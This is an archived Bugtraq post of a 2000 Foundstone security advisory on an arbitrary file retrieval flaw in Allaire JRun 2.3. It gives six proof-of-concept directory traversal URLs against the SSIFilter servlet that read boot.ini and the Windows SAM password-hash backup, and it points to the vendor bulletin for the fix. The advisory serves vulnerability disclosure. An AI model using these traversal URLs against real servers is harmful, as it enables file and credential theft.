[17312] in bugtraq
Allaire JRUN 2.3 Arbitrary File Retrieval
daemon@ATHENA.MIT.EDU (Foundstone Labs)
Tue Oct 24 00:10:29 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <5B8559F3126DD4119C5100B0D022A06D1F4004@mailwest>
Date: Mon, 23 Oct 2000 11:28:28 -0700
Reply-To: Foundstone Labs <labs@FOUNDSTONE.COM>
From: Foundstone Labs <labs@FOUNDSTONE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Foundstone, Inc.
http://www.foundstone.com
"Securing the Dot Com World"
Security Advisory
Allaire JRUN 2.3
----------------------------------------------------------------------
FS Advisory ID: FS-102300-13-JRUN
Release Date: October 23, 2000
Product: Allaire JRUN 2.3
Vendor: Allaire Inc. (http://www.allaire.com)
Vendor Advisory: http://www.allaire.com/security/
Type: Arbitrary File Retrieval
Severity: High
Author: Shreeraj Shah (shreeraj.shah@foundstone.com)
Saumil Shah (saumil.shah@foundstone.com)
Stuart McClure (stuart.mcclure@foundstone.com)
Foundstone, Inc. (http://www.foundstone.com)
Operating Systems: All operating systems supported by JRUN
Vulnerable versions: JRUN Server v2.3
Foundstone Advisory:
http://www.foundstone.com/cgi-bin/display.cgi?Section_ID=13
----------------------------------------------------------------------
Description
Multiple show code vulnerabilities exist in Allaire's JRUN
Server 2.3 allowing an attacker to view the source code of any
file within the web document root of the web server.
Using the same vulnerability, it is also possible to retrieve
arbitrary files that lie outside the web document root on the
host operating system's file system.
Details
JRun 2.3 uses Java Servlets to handle parsing of various types
of pages (for example, HTML, JSP, etc). Based on the settings
in the rules.properties and servlets.properties files, it is
possible to invoke any servlet using the URL prefix
"/servlet/".
It is possible to use JRun's SSIFilter servlet to retrieve
arbitrary files on the target system. The following two
examples show the URLs that can be used to retrieve any
arbitrary files:
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._
Note: It is assumed that JRun runs on host "jrun", port 8000.
Solution
Follow the recommendations given in Allaire Security Bulletin
ASB00-28, available at: http://www.allaire.com/security/
Credits
We would also like to thank Allaire for their prompt reaction
to this problem and their co-operation in heightening
security awareness in the security community.
Disclaimer
The information contained in this advisory is the copyright
(C) 2000 of Foundstone, Inc. and believed to be accurate at
the time of printing, but no representation or warranty is
given, express or implied, as to its accuracy or completeness.
Neither the author nor the publisher accepts any liability
whatsoever for any direct, indirect or conquential loss or
damage arising in any way from any use of, or reliance placed
on, this information for any purpose. This advisory may be
redistributed provided that no fee is assigned and that the
advisory is not modified in any way.